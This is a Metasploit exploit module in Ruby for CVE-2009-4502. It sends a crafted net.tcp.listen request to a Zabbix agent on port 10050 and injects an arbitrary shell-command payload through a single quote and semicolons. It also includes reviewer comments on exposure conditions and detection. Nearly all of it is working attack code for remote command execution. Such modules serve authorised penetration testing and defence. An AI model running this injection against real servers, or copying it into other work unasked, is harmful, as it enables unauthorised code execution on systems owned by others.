
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/misc/zabbix_agent_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for CVE-2009-4502, a shell-metacharacter injection in the
# net.tcp.listen item of the Zabbix agent on FreeBSD and Solaris.
#
# Reviewer notes for defenders:
# * Per the module description, the agent only answers peers whose source IP
#   is an authorized server in its configuration file. That IP check is the
#   sole gate visible from this module, so exposure depends on how tightly
#   that list and network access to the agent port (default 10050/tcp here)
#   are restricted.
# * The request built in #exploit puts a single quote and semicolons inside
#   the net.tcp.listen[...] parameter, where only a port number is expected.
#   Non-numeric content in that parameter is a reasonable detection signal.
# * Fixed releases are tracked in the ZBX-1032 reference below.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Declares the module metadata and registers the default agent port.
  #
  # @param info [Hash] metadata supplied by the framework, merged through
  #   update_info with the values defined here
  def initialize(info = {})
    references = [
      [ 'CVE', '2009-4502' ],
      [ 'OSVDB', '60956' ],
      [ 'URL', 'https://support.zabbix.com/browse/ZBX-1032']
    ]

    # The single quote is excluded because #exploit wraps the command in
    # single quotes when it builds the request line.
    payload_constraints = {
      'BadChars' => "'",
      'Space' => 1024,
      'DisableNops' => true,
      'Compat' => {
        'PayloadType' => 'cmd',
        'RequiredCmd' => 'generic perl telnet'
      }
    }

    module_info = {
      'Name' => 'Zabbix Agent net.tcp.listen Command Injection',
      'Description' => %q{
        This module exploits a metacharacter injection vulnerability
        in the FreeBSD and Solaris versions of the Zabbix agent. This flaw
        can only be exploited if the attacker can hijack the IP address
        of an authorized server (as defined in the configuration file).
      },
      'Author' => [ 'hdm' ],
      'License' => MSF_LICENSE,
      'References' => references,
      'Platform' => ['unix'],
      'Arch' => ARCH_CMD,
      'Privileged' => false,
      'Payload' => payload_constraints,
      'Targets' => [
        [ 'Automatic Target', {} ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2009-09-10'
    }

    super(update_info(info, module_info))

    register_options([ Opt::RPORT(10050) ])
  end

  # Sends one net.tcp.listen request to the agent and classifies the reply.
  #
  # The outcome is inferred from the reply text only:
  # * no reply              -> reported as "our IP is not an allowed server"
  # * ZBX_NOTSUPPORTED      -> reported as not vulnerable (version or OS)
  # * no ZBXD marker        -> reported as an unknown response
  # * anything else         -> reported as "should have executed"
  #
  # NOTE(review): the last case is not a confirmation. Nothing here checks
  # that the command actually ran, so the status lines are unreliable
  # evidence in either direction when this module is used for validation.
  def exploit
    connect

    # Port argument in the range 1..1024, followed by the quoted command.
    listen_port = rand(1024) + 1
    request = "net.tcp.listen[#{listen_port}';#{payload.encoded};']\n"

    print_status("Sending net.tcp.listen() request to the zabbix agent...")
    sock.put(request)

    # Wait up to 5 seconds; a peer that closes the connection without
    # answering is treated the same as no reply at all.
    reply =
      begin
        sock.get_once(-1, 5)
      rescue ::EOFError
        nil
      end

    failure =
      if !reply
        "The zabbix agent did not reply, our IP must not be in the allowed server list."
      elsif reply =~ /ZBX_NOTSUPPORTED/
        "The zabbix agent is not running a vulnerable version or operating system."
      elsif reply !~ /ZBXD/
        "The zabbix agent returned an unknown response."
      end

    if failure
      print_status(failure)
      disconnect
      return
    end

    print_status("The zabbix agent should have executed our command.")
    disconnect
  end
end